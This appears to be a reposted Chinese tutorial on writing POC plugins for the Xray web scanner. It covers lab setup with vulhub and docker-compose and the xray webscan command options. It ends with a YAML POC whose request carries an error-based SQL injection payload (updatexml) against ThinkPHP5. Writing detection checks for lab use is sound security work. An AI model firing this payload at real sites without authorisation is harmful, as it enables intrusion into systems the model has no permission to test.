1. 全栈程序员必看首页

Xray写POC插件

全栈程序员-站长 未分类 阅读 179

Xray写POC插件漏洞环境https://www.vulnhub.com/https://github.com/vulhub/vulhubhttps://github.com/QAX-A-Team/WeblogicEnvironment启用、关闭命令#启用环境docker-composeup-d环境关闭docker-composedown查看WEB应用容器root@…

大家好,又见面了,我是你们的朋友全栈君。

漏洞环境

  • https://www.vulnhub.com/
  • https://github.com/vulhub/vulhub
  • https://github.com/QAX-A-Team/WeblogicEnvironment

启用、关闭命令

# 启用环境
docker-compose up -d

环境关闭

docker-compose down

查看 WEB 应用容器

root@kali:/opt/vulhub/zabbix/CVE-2016-10134# docker ps
CONTAINER ID        IMAGE                        COMMAND                  CREATED             STATUS                      PORTS                  NAMES
b699f35aa2c8        vulhub/zabbix:3.0.3-server   "/docker-entrypoint.…"   30 minutes ago      Up 30 minutes (unhealthy)   162/udp, 10051/tcp     cve-2016-10134_agent_1
05cf05dacf6d        vulhub/zabbix:3.0.3-web      "/docker-entrypoint.…"   30 minutes ago      Up 30 minutes (healthy)     0.0.0.0:8080->80/tcp   cve-2016-10134_web_1
be0b0d3e74a7        mysql:5                      "docker-entrypoint.s…"   30 minutes ago      Up 30 minutes               3306/tcp, 33060/tcp    cve-2016-10134_mysql_1


# 意思是容器的80端口映射到主机的8080端口上
0.0.0.0:8080->80/tcp

资料

https://www.runoob.com/docker/docker-container-usage.html

https://vulhub.org/

https://github.com/Medicean/VulApps/

POC文档

  • https://chaitin.github.io/xray/#/guide/poc 编写说明

工具

  • https://github.com/chaitin/xray XRay 安全评估工具
  • https://phith0n.github.io/xray-poc-generation/ 在线辅助生成 XRay YAML POC
  • https://github.com/phith0n/xray-poc-generation 在线辅助生成 XRay YAML POC 源码

参考源码

  • https://github.com/chaitin/xray/tree/master/pocs 已经提交的POC源码

Xray的POC插件测试

  • 只运行单个内置 POC

在 xray 中,所有的 poc 隶属于插件 phantasm, 所以使用 poc 时需要开启 phantasm 插件才可生效。–poc 参数指定本次运行的 poc,如不指定,将运行所有的内置 poc。

xray webscan --plugins phantasm --poc /home/test/1.yaml --url http://example.com/

加载 /home/test/pocs/ 所有的 POC:

xray webscan --plugins phantasm --poc "/home/test/pocs/*"

加载 /home/test/pocs/ 下包含 thinkphp 的 POC

xray webscan --plugins phantasm --poc "/home/test/pocs/*thinkphp*"
  • https://paper.seebug.org/9/ 写通用POC需要注意的问题

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

转载于:https://www.cnblogs.com/17bdw/p/11468478.html

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/139218.html原文链接:https://javaforall.net

(1)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • <span role="heading" aria-level="2">python plotly 使用教程

    python plotly 使用教程

    python plotly 使用教程1、plotly介绍lotly的Python图形库使互动的出版质量图表成为在线。如何制作线图,散点图,面积图,条形图,误差线,箱形图,直方图,热图,子图,多轴,极坐标图和气泡图的示例。推荐最好使

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月5日
    30
  • WinHttp应用demo

    WinHttp应用demo

    WinHttp应用demo#include#include#include#pragmacomment(lib,”winhttp”)structcallback_param_t{HINTERNEThInet;DWORDdwErrCert;};staticVOIDCALLBACKSyncCallback(HINTERNET,DWORD_PTR,DWORD,

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月11日
    15
  • c# dllimport(如何做笔记)

    c# dllimport(如何做笔记)

    DllImport是System.Runtime.InteropServices命名空间下的一个属性类,其功能是提供从非托管DLL导出的函数的必要调用信息

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月11日
    51
  • linux修改密码报错_linux修改其他用户密码

    linux修改密码报错_linux修改其他用户密码

    linux修改密码报错_linux修改其他用户密码第一种:/usr/bin/passwd的权限中没有添加s即SUID特殊权限即:-rwxr-xr-x.1rootroot270008月222010/usr/bin/passwd解决方案:chmodu+s/usr/bin/passwdSUID的功能简单的说就是让组用户或其他用户在执行该文件是拥有文件所有者(own)权限,这里就是需要获取w(写)权限,这样才能将新密码写到/etc…

    全栈程序员-站长的头像 全栈程序员-站长
    2025年9月18日
    6
  • docker离线安装部署_ubuntu 离线安装docker docker

    docker离线安装部署_ubuntu 离线安装docker

    docker离线安装部署_ubuntu 离线安装docker说明使用虚拟机真实模仿离线环境虚拟机系统为CentOS7正文下载Docker二进制文件(离线安装包):下载地址本文使用/x86_64/docker-17.12.1-ce.tgz,注意对应操作系统类型。通过FTP工具将docker-17.12.1-ce.tgz上传到服务器上解压安装包tarzxfdocker-17.12.1-ce.tgz将docker相关命令拷贝到/usr/bin,方便直接运行命令sudocpdocker/*/usr/bin/启动Docke

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月26日
    5
  • M91A安全帽识别布控球 安全帽穿戴AI视频分析功能

    M91A安全帽识别布控球 安全帽穿戴AI视频分析功能

    M91A安全帽识别布控球 安全帽穿戴AI视频分析功能AI布控球基于前端边缘AI计算及后端云平台计算,AI布控球集成人脸识别、安全帽识别等的AI视频图像分析算法,通过计算机视觉技术对图像、人脸、场景、视频等进行深度学习,识别并标示图像、场景、视频内容,并对自定义的行为、意图进行识别并预警。AI识别能力介绍:着装检测:针对施工区域的人员是否戴安全帽。人脸检测:针对施工区域的人员是否陌生人(黑名单)。行为检测:针对施工区域内人员是否吸烟。区域检测:针对规定的区域划线后检测是否在区域内或区域外。4G高清安全帽识别布控球,是一款便携式的集4G无线、远程视

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月19日
    57

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号